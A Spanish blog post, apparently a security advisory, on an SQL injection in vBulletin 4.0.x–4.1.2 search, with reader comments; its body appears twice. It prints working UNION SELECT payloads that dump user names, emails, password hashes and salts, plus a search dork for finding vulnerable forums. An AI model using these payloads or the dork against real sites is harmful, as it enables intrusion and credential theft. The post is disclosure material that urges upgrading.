vBulletin es un famoso software de foros basado en PHP y MySQL. El mes pasado se reportó una seria inyección SQL que afectaba a sus versiones 4.0.x, 4.1.0, 4.1.1 y 4.1.2 y recientemente esa vulnerabilidad se está empezando a utilizar para atacar e infectar a múltiples foros.
El código vulnerable se encuentra en:
/vb/search/searchtools.php – línea 715;
/packages/vbforum/search/type/socialgroup.php – línea 201:203;
Y podemos inyectar las sentencia SQL a través de la búsqueda (search.php), concretamente en la petición POST de "Búsqueda con múltiples tipos de contenido" marcando "Grupos":
Ej:
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0×3a,email,0×3a,password,0×3a,salt)
FROM user WHERE userid=1#
Actualmente existen multitud de sitios vulnerables (Dork : inurl:"search.php?search_type=1") por lo que ¡se recomienda actualizar lo antes posible a la versión 4.1.3!
Referencias:
Sucuri Research Blog
Information Security News and Exploits
J0hn.X3r
El código vulnerable se encuentra en:
/vb/search/searchtools.php – línea 715;
/packages/vbforum/search/type/socialgroup.php – línea 201:203;
Y podemos inyectar las sentencia SQL a través de la búsqueda (search.php), concretamente en la petición POST de "Búsqueda con múltiples tipos de contenido" marcando "Grupos":
Ej:
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0×3a,email,0×3a,password,0×3a,salt)
FROM user WHERE userid=1#
Actualmente existen multitud de sitios vulnerables (Dork : inurl:"search.php?search_type=1") por lo que ¡se recomienda actualizar lo antes posible a la versión 4.1.3!
Referencias:
Sucuri Research Blog
Information Security News and Exploits
J0hn.X3r
Interesante artículo, hace unos días ya publicamos en Hacktimes la vulnerabilidad e incluso la ampliamos con un método para sacar la versión del vBulletin instalado. Pongo el enlace por si alguien quiere profundizar más en el fallo:
ResponderEliminarhttp://www.hacktimes.com/vulnerabilidad_de_sqli_en_vbulletin/
muy buena entrada y muy completa!
ResponderEliminarSe me pasó leerla y eso que la tenemos en nuestro blogroll..
yo lo leí en Twitter, y vosotros? Y eso que la entrada con el advisory (http://j0hnx3r.org/?p=818) era del 11 de abril :P
por cierto, genial también lo de sacar la versión y vuestros PoC!
Vicente, vimos el advisory hace tiempo por full disclosure y nos pusimos a trabajar y a investigar algo más el tema. Al final salió el artículo que has visto. Nos alegra que te haya gustado. Un saludo y a seguir así!!!!
ResponderEliminar